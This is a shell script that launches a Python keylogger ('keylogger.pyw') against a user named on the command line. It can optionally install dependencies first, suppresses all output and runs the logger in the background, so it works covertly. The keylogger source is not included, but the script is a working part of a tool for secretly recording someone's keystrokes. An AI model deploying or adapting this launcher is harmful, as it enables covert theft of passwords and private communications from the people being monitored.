#!/bin/sh 

LOGGER_USER=$USER
if [ $# -ge 1 ]; then
    LOGGER_USER=$1
    # echo "[ERROR] Invalid usage";
    # echo "[INFO] Correct usage: run <user> [install]";
    # exit 0;
fi

LOG_INSTALL="false"
if [ $# -ge 2 ]; then
    if [ $2 = "install" ]; then
        LOG_INSTALL="true";
    fi
fi

if [ $LOG_INSTALL == "true" ]; then
  sh ./source/initialize/installDependencies > /dev/null 2>&1;
#install python
fi

source source/venv/bin/activate; python3 source/keylogger.pyw $LOGGER_USER > /dev/null 2>&1 &